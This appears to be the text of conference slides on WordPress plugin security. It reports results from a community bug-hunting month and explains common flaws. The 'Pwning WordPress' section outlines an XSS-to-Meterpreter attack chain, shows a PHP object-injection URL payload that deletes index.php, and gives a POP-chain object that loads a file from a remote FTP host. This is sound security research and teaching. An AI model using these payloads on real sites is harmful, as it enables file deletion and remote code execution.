the state of security of wordpress (plugins) › download › the state of security of...summer of...
TRANSCRIPT
YorickKoster
Contents
• AboutMe• SummerofPwnage• StateofSecurity• Pwning WordPress
AboutMe
• YorickKoster• Co-FounderSecurifyProactiveSoftwareSecurity/BuildSecurityIn
• ~15yearsdoingsoftwaresecurity• Uncoveredvulnerabilitiesinvariousproducts– InternetExplorer,Office,.NETFramework,AdobeReader,WordPress &more.
SummerofPwnage
SummerofPwnage
• Startedasjoke• UsedGithub tofindObjectInjection
• Wedidn’tknowhowtorunacon(stilldon’t😉 )
SummerofPwnage
• MonthofWordPresshacking• Meetupeveryweek• VMwithWordPress&~1000plugins/themes• Forstudents&peoplewlittleexperience• ~25-30activeparticipants• Resultedin118findings(5Core)
https://www.sumofpwn.nl/advisories.htmlhttps://twitter.com/sumofpwn
SummerofPwnageResults
Cross-SiteScripting66%
Cross-SiteRequestForgery
12% PHPObjectInjection
8%
(Remote)CodeExecution4%
LocalFileInclusion3%
DenialofService3%
AuthenticationBypass2%
Misc
2%
Other14%
SummerofXSS😎
SummerofPwnageResults
65%
23%
12%
CSRF Pre-auth Privilegeescalation
SummerofPwnageResults
0
10
20
30
40
50
60
70
80
Fixed Open Nofix
SummerofPwnageMediacoverage
42
SummerofPwnageObservations• Focusonlowhangingfruit• Grepisking• Gettingstufffixedishard• Securityknowledgepluginswritersislow
WordPress(Plugins)
StateofSecurity
WordPress SecurityCore• WordPressisblogsoftwarewithCMSfeatures• Powers~27%ofallwebsites(reportedly)• Focusonwhocaneditwhichcontent– Contentiseitherpublishedornot*–Mediacanbeenumerated*
WordPress SecurityCore• Seemslikethey’velearnedthehardway• Coreisrelativesecure(appeartoknowtheirstuff)– Filtering/validation– Anti-CSRF(nonces)– Automaticupdates🙂
• (Legacy)issues– Nopreparedstatements– SaltedMD5passwords– Loginbruteforce– NotdesignedforCSP
WordPressSecurityPlugins• Vulnerabilitiesinonly~100pluginsof1000popularplugins(10%)
• Keepinmind:– Limited(spare)time– Focusonlowhangingfruit
WordPressSecurityPlugins• SomeAPIsaresecurebydefault– Eg,preventSQLi
• Somearenot– Outputencoding– CSRFprotection
• HighnumberofXSS&CSRFissuesget_post( int|WP_Post|null $post = null, string $output = OBJECT, string $filter = 'raw' )Retrieves post data given a post ID or post object.
function column_default($item, $column_name){
$item = apply_filters('ull-output-data', $item);//unset existing filter and pagination$args = wp_parse_args( parse_url($_SERVER["REQUEST_URI"], PHP_URL_QUERY) );unset($args['filter']);unset($args['paged']);switch($column_name){
case 'id':case 'uid':case 'time':
case 'data':return $item[$column_name];case 'image':
$user = new WP_User( $item['uid'] );$user_email = $user->user_email;return get_avatar( $user_email, 60 );
case 'user_email':return $item[$column_name];
case 'ip':return $item[$column_name];
WordPressSecurityPlugins(XSS)
WordPressSecurityPluginsWe'resorryfortheinconvenience,wewillfixthisrightaway.
Wewillneedtohaveaccesstoyourftpinformationsowecanloginandlookintothis,canyoupleaseprovideuswithlogincredentials?
IsthereareasonaWordPressnonceisn'tsufficientforthissecurityconcern?
Canyou atleast explainmethedamageitcouldcreate?
Canyouhelpmeunderstandwhyjson_encode/json_decode issuperiortousingserialize/unserialize?
[…]iscalledbyaWordpress add_menu_page,intheoryitisWordpress thathasfiltertheinputwhencallingthepage.
WordPressSecuritySummary• WordPressCoreisrelativesecure• Corehasknown(legacy)issues• Lotsofinsecureplugins– DangerousAPIs– Lowsecurityawareness–MostlyXSS&CSRF
Pwning WordPress
Pwning WordPressCross-SiteScripting
Pwning WordPressCross-SiteScripting
Pwning WordPressCross-SiteScripting• InjectXSSpayload• Waitforadmintovisitvulnerablepage• Run2ndstageJavaScriptpayloadto:– modifyPHPfile;– visitPHPfile;– runPHPMeterpreterclient.
Pwning WordPressCross-SiteScripting
Pwning WordPressHardening• Ifyoudon’tneedtheeditor,disableit• Morehardening:
https://codex.wordpress.org/Hardening_WordPress
Pwning WordPressPHPObjectInjection
Pwning WordPressPHPObjectInjection
<?phpclass Example1 {public $cache_file;function __construct() {
// some PHP code...}
function __destruct() {$file = "/var/www/cache/tmp/{$this->cache_file}";if (file_exists($file)) @unlink($file);
}}
// some PHP code...$user_data = unserialize($_GET['data']);// some PHP code...?>
http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}
OWASPexample
Pwning WordPressPHPObjectInjection• Findtherighttarget• Direct:
– __destruct()– __wakeup()
• Indirect:– __toString()– __call()– __set()– __get()
• Autoloading:– spl_autoload_register()
Pwning WordPressPHPObjectInjection• NoeasyexploitableclassinWordPress• FindthecorrectPOPchain• POPchainpresentedbySamThomas
http://www.slideshare.net/_s_n_t/php-unserialization-vulnerabilities-what-are-we-missing
• Attackstillworksinlatestversion(4.6.1)• UsesWP_Theme::__toString()asstartpoint
Pwning WordPressPHPObjectInjection
WP_Theme __toString() display() load_textdomain() load_theme_textdomain()
i10n.phpload_textdomain()is_readable()ImportMOfile
Pwning WordPressPHPObjectInjection
Pwning WordPressPHPObjectInjection
Pwning WordPressPHPObjectInjection
Pwning WordPressPHPObjectInjection• Finalobject
WP_Theme Object(
[theme_root:WP_Theme:private] => ftp://anonymous:[email protected][headers:WP_Theme:private] => Array
([Name] => foo[TextDomain] => default
)[stylesheet:WP_Theme:private] => foobar
)
Questions?
[email protected]@yorickkoster /@securifybv